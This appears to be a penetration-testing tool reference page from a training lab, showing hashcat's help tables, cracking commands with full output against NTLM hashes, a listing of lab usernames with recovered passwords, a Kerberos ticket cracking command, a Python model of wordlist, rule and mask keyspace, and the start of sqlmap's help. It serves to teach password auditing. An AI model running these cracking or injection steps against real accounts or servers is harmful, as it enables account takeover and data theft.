  13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode         | Full-Disk Encryption (FDE)
  13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode         | Full-Disk Encryption (FDE)
  13721 | VeraCrypt SHA512 + XTS 512 bit                      | Full-Disk Encryption (FDE)
  13722 | VeraCrypt SHA512 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
  13723 | VeraCrypt SHA512 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
  13771 | VeraCrypt Streebog-512 + XTS 512 bit                | Full-Disk Encryption (FDE)
  13772 | VeraCrypt Streebog-512 + XTS 1024 bit               | Full-Disk Encryption (FDE)
  13773 | VeraCrypt Streebog-512 + XTS 1536 bit               | Full-Disk Encryption (FDE)
  13781 | VeraCrypt Streebog-512 + XTS 512 bit + boot-mode    | Full-Disk Encryption (FDE)
  13782 | VeraCrypt Streebog-512 + XTS 1024 bit + boot-mode   | Full-Disk Encryption (FDE)
  13783 | VeraCrypt Streebog-512 + XTS 1536 bit + boot-mode   | Full-Disk Encryption (FDE)
  13731 | VeraCrypt Whirlpool + XTS 512 bit                   | Full-Disk Encryption (FDE)
  13732 | VeraCrypt Whirlpool + XTS 1024 bit                  | Full-Disk Encryption (FDE)
  13733 | VeraCrypt Whirlpool + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  23900 | BestCrypt v3 Volume Encryption                      | Full-Disk Encryption (FDE)
  16700 | FileVault 2                                         | Full-Disk Encryption (FDE)
  27500 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-128-XTS)       | Full-Disk Encryption (FDE)
  27600 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-256-XTS)       | Full-Disk Encryption (FDE)
  20011 | DiskCryptor SHA512 + XTS 512 bit                    | Full-Disk Encryption (FDE)
  20012 | DiskCryptor SHA512 + XTS 1024 bit                   | Full-Disk Encryption (FDE)
  20013 | DiskCryptor SHA512 + XTS 1536 bit                   | Full-Disk Encryption (FDE)
  22100 | BitLocker                                           | Full-Disk Encryption (FDE)
  12900 | Android FDE (Samsung DEK)                           | Full-Disk Encryption (FDE)
   8800 | Android FDE <= 4.3                                  | Full-Disk Encryption (FDE)
  18300 | Apple File System (APFS)                            | Full-Disk Encryption (FDE)
   6211 | TrueCrypt RIPEMD160 + XTS 512 bit                   | Full-Disk Encryption (FDE)
   6212 | TrueCrypt RIPEMD160 + XTS 1024 bit                  | Full-Disk Encryption (FDE)
   6213 | TrueCrypt RIPEMD160 + XTS 1536 bit                  | Full-Disk Encryption (FDE)
   6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode       | Full-Disk Encryption (FDE)
   6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode      | Full-Disk Encryption (FDE)
   6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode      | Full-Disk Encryption (FDE)
   6221 | TrueCrypt SHA512 + XTS 512 bit                      | Full-Disk Encryption (FDE)
   6222 | TrueCrypt SHA512 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
   6223 | TrueCrypt SHA512 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
   6231 | TrueCrypt Whirlpool + XTS 512 bit                   | Full-Disk Encryption (FDE)
   6232 | TrueCrypt Whirlpool + XTS 1024 bit                  | Full-Disk Encryption (FDE)
   6233 | TrueCrypt Whirlpool + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  12200 | eCryptfs                                            | Full-Disk Encryption (FDE)
  10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4)                       | Documents
  10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1          | Documents
  10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2          | Documents
  10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8)                       | Documents
  25400 | PDF 1.4 - 1.6 (Acrobat 5 - 8) - edit password       | Documents
  10600 | PDF 1.7 Level 3 (Acrobat 9)                         | Documents
  10700 | PDF 1.7 Level 8 (Acrobat 10 - 11)                   | Documents
   9400 | MS Office 2007                                      | Documents
   9500 | MS Office 2010                                      | Documents
   9600 | MS Office 2013                                      | Documents
  25300 | MS Office 2016 - SheetProtection                    | Documents
   9700 | MS Office <= 2003 $0/$1, MD5 + RC4                  | Documents
   9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1     | Documents
   9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2     | Documents
   9810 | MS Office <= 2003 $3, SHA1 + RC4, collider #1       | Documents
   9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2       | Documents
   9800 | MS Office <= 2003 $3/$4, SHA1 + RC4                 | Documents
  18400 | Open Document Format (ODF) 1.2 (SHA-256, AES)       | Documents
  18600 | Open Document Format (ODF) 1.1 (SHA-1, Blowfish)    | Documents
  16200 | Apple Secure Notes                                  | Documents
  23300 | Apple iWork                                         | Documents
   6600 | 1Password, agilekeychain                            | Password Managers
   8200 | 1Password, cloudkeychain                            | Password Managers
   9000 | Password Safe v2                                    | Password Managers
   5200 | Password Safe v3                                    | Password Managers
   6800 | LastPass + LastPass sniffed                         | Password Managers
  13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)         | Password Managers
  23400 | Bitwarden                                           | Password Managers
  16900 | Ansible Vault                                       | Password Managers
  26000 | Mozilla key3.db                                     | Password Managers
  26100 | Mozilla key4.db                                     | Password Managers
  23100 | Apple Keychain                                      | Password Managers
  11600 | 7-Zip                                               | Archives
  12500 | RAR3-hp                                             | Archives
  23800 | RAR3-p (Compressed)                                 | Archives
  23700 | RAR3-p (Uncompressed)                               | Archives
  13000 | RAR5                                                | Archives
  17220 | PKZIP (Compressed Multi-File)                       | Archives
  17200 | PKZIP (Compressed)                                  | Archives
  17225 | PKZIP (Mixed Multi-File)                            | Archives
  17230 | PKZIP (Mixed Multi-File Checksum-Only)              | Archives
  17210 | PKZIP (Uncompressed)                                | Archives
  20500 | PKZIP Master Key                                    | Archives
  20510 | PKZIP Master Key (6 byte optimization)              | Archives
  23001 | SecureZIP AES-128                                   | Archives
  23002 | SecureZIP AES-192                                   | Archives
  23003 | SecureZIP AES-256                                   | Archives
  13600 | WinZip                                              | Archives
  18900 | Android Backup                                      | Archives
  24700 | Stuffit5                                            | Archives
  13200 | AxCrypt 1                                           | Archives
  13300 | AxCrypt 1 in-memory SHA1                            | Archives
  23500 | AxCrypt 2 AES-128                                   | Archives
  23600 | AxCrypt 2 AES-256                                   | Archives
  14700 | iTunes backup < 10.0                                | Archives
  14800 | iTunes backup >= 10.0                               | Archives
   8400 | WBB3 (Woltlab Burning Board)                        | Forums, CMS, E-Commerce
   2612 | PHPS                                                | Forums, CMS, E-Commerce
    121 | SMF (Simple Machines Forum) > v1.1                  | Forums, CMS, E-Commerce
   3711 | MediaWiki B type                                    | Forums, CMS, E-Commerce
   4521 | Redmine                                             | Forums, CMS, E-Commerce
  24800 | Umbraco HMAC-SHA1                                   | Forums, CMS, E-Commerce
     11 | Joomla < 2.5.18                                     | Forums, CMS, E-Commerce
  13900 | OpenCart                                            | Forums, CMS, E-Commerce
  11000 | PrestaShop                                          | Forums, CMS, E-Commerce
  16000 | Tripcode                                            | Forums, CMS, E-Commerce
   7900 | Drupal7                                             | Forums, CMS, E-Commerce
   4522 | PunBB                                               | Forums, CMS, E-Commerce
   2811 | MyBB 1.2+, IPB2+ (Invision Power Board)             | Forums, CMS, E-Commerce
   2611 | vBulletin < v3.8.5                                  | Forums, CMS, E-Commerce
   2711 | vBulletin >= v3.8.5                                 | Forums, CMS, E-Commerce
  25600 | bcrypt(md5($pass)) / bcryptmd5                      | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                    | Forums, CMS, E-Commerce
     21 | osCommerce, xt:Commerce                             | Forums, CMS, E-Commerce
  18100 | TOTP (HMAC-SHA1)                                    | One-Time Passwords
   2000 | STDOUT                                              | Plaintext
  99999 | Plaintext                                           | Plaintext
  21600 | Web2py pbkdf2-sha512                                | Framework
  10000 | Django (PBKDF2-SHA256)                              | Framework
    124 | Django (SHA-1)                                      | Framework
  12001 | Atlassian (PBKDF2-HMAC-SHA1)                        | Framework
  19500 | Ruby on Rails Restful-Authentication                | Framework
  27200 | Ruby on Rails Restful Auth (one round, no sitekey)  | Framework
  20200 | Python passlib pbkdf2-sha512                        | Framework
  20300 | Python passlib pbkdf2-sha256                        | Framework
  20400 | Python passlib pbkdf2-sha1                          | Framework
  24410 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA1 + 3DES/AES)   | Private Key
  24420 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA256 + 3DES/AES) | Private Key
  15500 | JKS Java Key Store Private Keys (SHA1)              | Private Key
  22911 | RSA/DSA/EC/OpenSSH Private Keys ($0$)               | Private Key
  22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$)               | Private Key
  22931 | RSA/DSA/EC/OpenSSH Private Keys ($1, $3$)           | Private Key
  22941 | RSA/DSA/EC/OpenSSH Private Keys ($4$)               | Private Key
  22951 | RSA/DSA/EC/OpenSSH Private Keys ($5$)               | Private Key
  23200 | XMPP SCRAM PBKDF2-SHA1                              | Instant Messaging Service
  22600 | Telegram Desktop < v2.1.14 (PBKDF2-HMAC-SHA1)       | Instant Messaging Service
  24500 | Telegram Desktop >= v2.1.14 (PBKDF2-HMAC-SHA512)    | Instant Messaging Service
  22301 | Telegram Mobile App Passcode (SHA256)               | Instant Messaging Service
     23 | Skype                                               | Instant Messaging Service
  26600 | MetaMask Wallet                                     | Cryptocurrency Wallet
  21000 | BitShares v0.x - sha512(sha512_bin(pass))           | Cryptocurrency Wallet
  11300 | Bitcoin/Litecoin wallet.dat                         | Cryptocurrency Wallet
  16600 | Electrum Wallet (Salt-Type 1-3)                     | Cryptocurrency Wallet
  21700 | Electrum Wallet (Salt-Type 4)                       | Cryptocurrency Wallet
  21800 | Electrum Wallet (Salt-Type 5)                       | Cryptocurrency Wallet
  12700 | Blockchain, My Wallet                               | Cryptocurrency Wallet
  15200 | Blockchain, My Wallet, V2                           | Cryptocurrency Wallet
  18800 | Blockchain, My Wallet, Second Password (SHA256)     | Cryptocurrency Wallet
  25500 | Stargazer Stellar Wallet XLM                        | Cryptocurrency Wallet
  16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256        | Cryptocurrency Wallet
  15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256                 | Cryptocurrency Wallet
  15700 | Ethereum Wallet, SCRYPT                             | Cryptocurrency Wallet
  22500 | MultiBit Classic .key (MD5)                         | Cryptocurrency Wallet
  22700 | MultiBit HD (scrypt)                                | Cryptocurrency Wallet
 
- [ Brain Client Features ] -
 
  # | Features
 ===+========
  1 | Send hashed passwords
  2 | Send attack positions
  3 | Send hashed passwords and attack positions
 
- [ Outfile Formats ] -
 
  # | Format
 ===+========
  1 | hash[:salt]
  2 | plain
  3 | hex_plain
  4 | crack_pos
  5 | timestamp absolute
  6 | timestamp relative
 
- [ Rule Debugging Modes ] -
 
  # | Format
 ===+========
  1 | Finding-Rule
  2 | Original-Word
  3 | Original-Word:Finding-Rule
  4 | Original-Word:Finding-Rule:Processed-Word
 
- [ Attack Modes ] -
 
  # | Mode
 ===+======
  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist
  9 | Association
 
- [ Built-in Charsets ] -
 
  ? | Charset
 ===+=========
  l | abcdefghijklmnopqrstuvwxyz [a-z]
  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ [A-Z]
  d | 0123456789                 [0-9]
  h | 0123456789abcdef           [0-9a-f]
  H | 0123456789ABCDEF           [0-9A-F]
  s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  a | ?l?u?d?s
  b | 0x00 - 0xff
 
- [ OpenCL Device Types ] -
 
  # | Device Type
 ===+=============
  1 | CPU
  2 | GPU
  3 | FPGA, DSP, Co-Processor
 
- [ Workload Profiles ] -
 
  # | Performance | Runtime | Power Consumption | Desktop Impact
 ===+=============+=========+===================+=================
  1 | Low         |   2 ms  | Low               | Minimal
  2 | Default     |  12 ms  | Economic          | Noticeable
  3 | High        |  96 ms  | High              | Unresponsive
  4 | Nightmare   | 480 ms  | Insane            | Headless
 
- [ License ] -
 
  hashcat is licensed under the MIT license
  Copyright and license terms are listed in docs/license.txt
 
- [ Basic Examples ] -
 
  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule
  Brute-Force      | MD5   | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a
  Combinator       | MD5   | hashcat -a 1 -m 0 example0.hash example.dict example.dict
  Association      | $1$   | hashcat -a 9 -m 500 example500.hash 1word.dict -r rules/best64.rule
 
If you still have no idea what just happened, try the following pages:
 
* https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild
* https://hashcat.net/faq/
 
If you think you need help by a real human come to the hashcat Discord:
 
* https://discord.gg/HFS523HGBT

Examples

hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt

This runs hashcat with workload profile 3 (the second highest) in attack mode 0 (straight: each dictionary entry is tried as-is) against the specified hash file using the provided dictionary.

sec@slingshot:~$ hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
 
31d6cfe0d16ae931b73c59d7e0c089c0:                        
5bd9b7b6fce76d3aabfebee9debaa932:Warrior07               
87e968ead530264915a4b295c57c37d5:Tibbetts3               
5deaec4b57b859c25cdd0513fb7bc750:Patrique2238            
d8d9eee954da5f2d42fe72f862fa493f:Packardbell350          
9b5684b030226a1203e4e7b718a3f9df:Oozle11                 
23d26a03aa7102abce4805d88e568a78:KAMTPS20!!tim           
fe1f27a2561b61511588b0d24e333a7c:Chirmol01               
7a1f1fd59eb2b97041c74748ea6a68f8:BHLMSTz2                
bf459116e5854e34031997be8e13596d:Angels100%              
ca3f0e9ce3188b0602742da2976d6773:2soWht!a                
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:07:12 2022 (11 secs)
Time.Estimated...: Thu Mar 17 02:07:23 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  1243.6 kH/s (0.03ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 11/36 (30.56%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f313233] -> $HEX[042a0337c2a156616d6f732103]
 
Started: Thu Mar 17 02:07:00 2022
Stopped: Thu Mar 17 02:07:24 2022

hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt -r /usr/local/share/doc/hashcat/rules/best64.rule

This is similar to the command above, except it also applies the rule file best64.rule, so each entry of the provided wordlist is tried in every mangled form those rules produce.

sec@slingshot:~$ hashcat -w 3 -a 0 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt -r /usr/local/share/doc/hashcat/rules/best64.rule
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
INFO: Removed 11 hashes found as potfile entries or as empty hashes.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 1104517568
 
5ae44bf0a1e24c0b1ec96708f30e7b84:Smitten77               
92929561b2758f409df2b4a24a59c6f4:Alphabet23              
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
 
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:14:29 2022 (2 mins, 14 secs)
Time.Estimated...: Thu Mar 17 02:16:43 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt)
Guess.Mod........: Rules (/usr/local/share/doc/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  8011.9 kH/s (1.14ms) @ Accel:256 Loops:77 Thr:1 Vec:8
Recovered........: 13/36 (36.11%) Digests
Progress.........: 1104517568/1104517568 (100.00%)
Rejected.........: 0/1104517568 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-77 Iteration:0-77
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f313233] -> $HEX[04a156616d6f]
 
Started: Thu Mar 17 02:14:28 2022
Stopped: Thu Mar 17 02:16:45 2022

hashcat -w 3 -a 6 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt ?d?d

This is similar to the commands above, except it uses attack mode 6 (hybrid wordlist + mask): instead of predefined mangling rules, it appends every candidate generated by the mask at the end of the command (?d?d, two digits) to each dictionary word.

sec@slingshot:~$ hashcat -w 3 -a 6 -m 1000 ~/labs/web01.hashes /opt/passwords/rockyou.txt ?d?d
hashcat (v6.2.4) starting
 
* Device #1: Outdated POCL OpenCL driver detected!
 
This OpenCL driver may fail kernel compilation or produce false negatives.
You can use --force to override, but do not report related errors.
 
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
===========================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, skipped
 
OpenCL API (OpenCL 1.2 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: Intel(R) Core(TM) i9-10900K CPU @ 3.70GHz, 1940/3944 MB (493 MB allocatable), 2MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 37 digests; 36 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
 
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
INFO: Removed 13 hashes found as potfile entries or as empty hashes.
 
Host memory required for this attack: 0 MB
 
Dictionary cache hit:
* Filename..: /opt/passwords/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 1434438400
 
7ce56170c73f9582fa348db88de2c192:Gathering81             
Approaching final keyspace - workload adjusted.          
 
                                                           
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: /home/sec560/labs/web01.hashes
Time.Started.....: Thu Mar 17 02:20:46 2022 (1 min, 9 secs)
Time.Estimated...: Thu Mar 17 02:21:55 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/passwords/rockyou.txt), Left Side
Guess.Mod........: Mask (?d?d) [2], Right Side
Guess.Queue.Base.: 1/1 (100.00%)
Guess.Queue.Mod..: 1/1 (100.00%)
Speed.#2.........: 20964.9 kH/s (0.55ms) @ Accel:256 Loops:100 Thr:1 Vec:8
Recovered........: 14/36 (38.89%) Digests
Progress.........: 1434438400/1434438400 (100.00%)
Rejected.........: 0/1434438400 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-100 Iteration:0-100
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[0861365f3132333132] -> $HEX[042a0337c2a156616d6f7321033638]
 
Started: Thu Mar 17 02:20:34 2022
Stopped: Thu Mar 17 02:21:55 2022

hashcat -m 1000 --username --show --outfile-format 2 labs/web01.hashes

This command shows all the NT hashes from the provided hash file that we have cracked so far, printed as username:password.

sec@slingshot:~$ hashcat -m 1000 --username --show --outfile-format 2 labs/web01.hashes
Guest:
DefaultAccount:
slopez:Tibbetts3
aparker:Oozle11
rgray:KAMTPS20!!tim
wrobinson:Patrique2238
mlara:Packardbell350
lstout:2soWht!a
tandersen:Angels100%
awalker:Chirmol01
mmiller:BHLMSTz2
vcollins:Warrior07
hhopkins:Alphabet23
kcooper:Smitten77
rduarte:Gathering81

hashcat -m 13100 -a 6 /tmp/tickets /opt/passwords/passwords.txt ?d?d?d?d

This will attempt to crack a Kerberos service ticket hash using the password list, appending four digits (?d?d?d?d) to the end of each entry.
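The three NTLM attacks and the Kerberos one above, modelled offline as an added example (this is not hashcat's code): it expands masks from the built-in charset table, applies a small subset of hashcat's rule syntax, reproduces the Keyspace figures shown in the output above, and reports which candidate stream reaches which password. The wordlist and passwords in demo() are constructed, and SHA-256 stands in for NTLM.

```python
"""
Added example (not hashcat's code): an offline model of the attack shapes run
on this page, so keyspace and coverage of a wordlist, rule file or hybrid mask
can be reasoned about before a job: -a 0 -> |W|; -a 0 -r R -> |W|*|R|;
-a 6 W ?d?d -> |W|*|mask|. Assumed: only a subset of hashcat's rule functions
is modelled; demo()'s wordlist and passwords are constructed; SHA-256 stands
in for NTLM (MD4 over UTF-16LE), which not every Python build provides.
"""
import hashlib
import itertools
import math
import string

# Built-in charsets as listed in hashcat's help (?h ?H ?b omitted for brevity).
SPECIALS = " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": SPECIALS,
    "a": string.ascii_letters + string.digits + SPECIALS,
}

# Single-character rule functions (subset of hashcat's rule language).
RULE_FUNCS = {
    ":": lambda w: w,                                  # no-op
    "l": str.lower,
    "u": str.upper,
    "c": lambda w: w[:1].upper() + w[1:].lower(),      # capitalize
    "r": lambda w: w[::-1],                            # reverse
    "]": lambda w: w[:-1],                             # drop last char
}

def parse_mask(mask):
    """One charset per position ('?d?d' -> [digits, digits]); a plain
    character is a literal and '??' is a literal question mark."""
    out, i = [], 0
    while i < len(mask):
        tok = mask[i + 1] if mask[i] == "?" and i + 1 < len(mask) else None
        if mask[i] != "?":
            out.append(mask[i])
        elif tok == "?":
            out.append("?")
        elif tok in CHARSETS:
            out.append(CHARSETS[tok])
        else:
            raise ValueError(f"bad charset token ?{tok} in {mask!r}")
        i += 2 if mask[i] == "?" else 1
    return out

def mask_keyspace(mask):
    """Candidates the mask alone yields: ?d?d -> 100, ?d?d?d?d -> 10000."""
    return math.prod(len(cs) for cs in parse_mask(mask))

def apply_rule(rule, word):
    """Apply one rule line; '$X' appends X, '^X' prepends X, spaces ignored."""
    out, i = word, 0
    while i < len(rule):
        f = rule[i]
        if f in RULE_FUNCS:
            out = RULE_FUNCS[f](out)
        elif f in "$^":
            if i + 1 >= len(rule):
                raise ValueError(f"{rule!r}: {f} needs a character")
            out = out + rule[i + 1] if f == "$" else rule[i + 1] + out
            i += 1
        elif f != " ":
            raise ValueError(f"unsupported rule function {f!r}")
        i += 1
    return out

def candidates(words, rules=None, mask=None):
    """-a 0 (neither), -a 0 -r (rules) or -a 6 (mask appended to each word)."""
    if rules and mask:
        raise ValueError("rules and mask are exclusive")
    tails = ["".join(p) for p in itertools.product(*parse_mask(mask))] if mask else [""]
    for w in words:
        yield from ([apply_rule(r, w) for r in rules] if rules else [w + t for t in tails])

def keyspace(word_count, rules=None, mask=None):
    """hashcat's Keyspace line: wordlist size times the amplifier."""
    return word_count * (len(rules) if rules else mask_keyspace(mask) if mask else 1)

def sha256_hex(password):
    return hashlib.sha256(password.encode()).hexdigest()

def run_attack(digests, hash_fn, words, rules=None, mask=None):
    """Plaintexts of the given digests that this candidate stream reaches."""
    return sorted({c for c in candidates(words, rules, mask) if hash_fn(c) in digests})

def demo(hash_fn=sha256_hex):
    """Constructed audit: which of six passwords each attack shape recovers."""
    words = ["Warrior", "Gathering", "smitten", "alphabet", "password"]
    plaintexts = ["Warrior07", "Gathering81", "Smitten77", "Alphabet23",
                  "password", "2soWht!a"]
    digests = {hash_fn(p) for p in plaintexts}
    rules = [":", "c $7 $7", "c $2 $3"]
    return {"straight": run_attack(digests, hash_fn, words),
            "rules": run_attack(digests, hash_fn, words, rules=rules),
            "hybrid": run_attack(digests, hash_fn, words, mask="?d?d")}
```

With the page's 14344384-word rockyou.txt, keyspace() gives 1104517568 for 77 rules and 1434438400 for ?d?d, the figures hashcat printed above; a password such as 2soWht!a survives all three streams in demo(), which is the point of checking coverage before a job.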

Blog Posts

sqlmap

Description

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

Platform: All
Author: Sqlmap Project
License: GPLv3
URL: https://sqlmap.org

Usage

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
Usage: python3 sqlmap [options]
 
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
 
  Target:
    At least one of these options has to be provided to define the
    target(s)
 
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -d DIRECT           Connection string for direct database connection
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file
 
  Request:
    These options can be used to specify how to connect to the target URL
 
    -A AGENT, --user..  HTTP User-Agent header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --param-del=PARA..  Character used for splitting parameter values (e.g. &)
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)
    --live-cookies=L..  Live cookies file used for loading up-to-date values
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --mobile            Imitate smartphone through HTTP User-Agent header
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
